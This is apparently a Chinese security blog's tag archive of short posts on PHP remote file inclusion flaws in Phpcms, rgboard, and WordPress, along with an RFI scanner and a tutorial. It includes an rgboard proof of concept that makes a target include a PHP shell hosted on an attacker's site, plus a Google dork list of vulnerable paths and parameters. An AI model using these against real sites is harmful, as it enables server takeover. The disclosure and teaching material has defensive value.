标签 ‘RFI’ 下的日志

Phpcms 2007 远程文件包含漏洞

Flyh4t [w.s.t] 原文
www.wolvez.org
该cms的核心配置文件/include/common.inc.php有缺陷
——————————————–
//23行开始
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);
————————————————
这里extract函数会导致变量覆盖,可能引发一系列的问题
阅读全文 »

Tags: ,

rgboard 3.0.12 远程文件包含漏洞

鬼仔:昨天有事出去了下,家里宽带到期了,我竟然不知道,晚上回来之后才发现的,今天去交了费,所以更新没跟上。

Infos: rgboard 3.0.12 远程文件包含漏洞
Author: Flyh4t[w.s.t]

rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
vul code:
\include\bbs.lib.inc.php:
if (!defined(‘BBS_LIB_INC_INCLUDED’)) {
define(‘BBS_LIB_INC_INCLUDED’, 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/

Tags: , , ,

PHP Security-Shell RFI Scanner

鬼仔注:代码放到txt里了。

来源:cnfjhh

本地RFI检测文件工具,可以方便的查找有问题的文件,快速挖掘php远程包含漏洞的利器。
eg:
PHP scanner.php secow

scanner.php and secow 要和PHP环境放在一起,其中secow指的所要检测的php程序文件夹

scanner.php的完整代码如下:
article_1471_code.txt

Tags: , ,

Rfi vulnz scanner From Spain

来源:Sleepig'Blog
阅读全文 »

Tags:

WordPress v2.1.3 >> remote file include

鬼仔注:前两天看到的,一直考虑要不要放上来,因为我测试没有成功,只是爆出了物理路径(文章末尾附图)。有测试成功的说明下。

来源:SecurityFocus

by : www.hackeraz.ir userz , saeid…
++++++++++++++++++++++++++++++++++++
####################################################
#WordPress >> 2.1.3 Remote File Inclusion #
####################################################
Affected Software .: WordPress >> 2.1.3 #
阅读全文 »

Tags: ,

包含文件漏洞详解

作者:IceskYsl@1st
来源:天马行空{1.S.T}(http://www.1steam.cn)/
申明:本站原创,欢迎转载,请注明来源天马行空{1.S.T}(http://www.1steam.cn)/
=============

首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。几乎所有的cgi程序都有这样的 bug,只是具体的表现方式不一样罢了。

一、涉及到的危险函数〔include(),require()和include_once(),require_once()〕

include() && require()语句:包括并运行指定文件。
阅读全文 »

Tags:

Remote File Inclusion list [ with d0rkz ]

来源:x140yu

1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=
阅读全文 »

Tags:

WordPress functions.php脚本远程文件包含漏洞

受影响系统:
WordPress 2.0.5
描述:
——————————————————————————–
BUGTRAQ ID: 21004

WordPress是一款免费的论坛Blog系统。

WordPress处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。

WordPress的functions.php脚本没有正确地验证file变量的数据,允许攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。

<*来源:_ANtrAX_*>

测试方法:
——————————————————————————–
阅读全文 »

Tags: , ,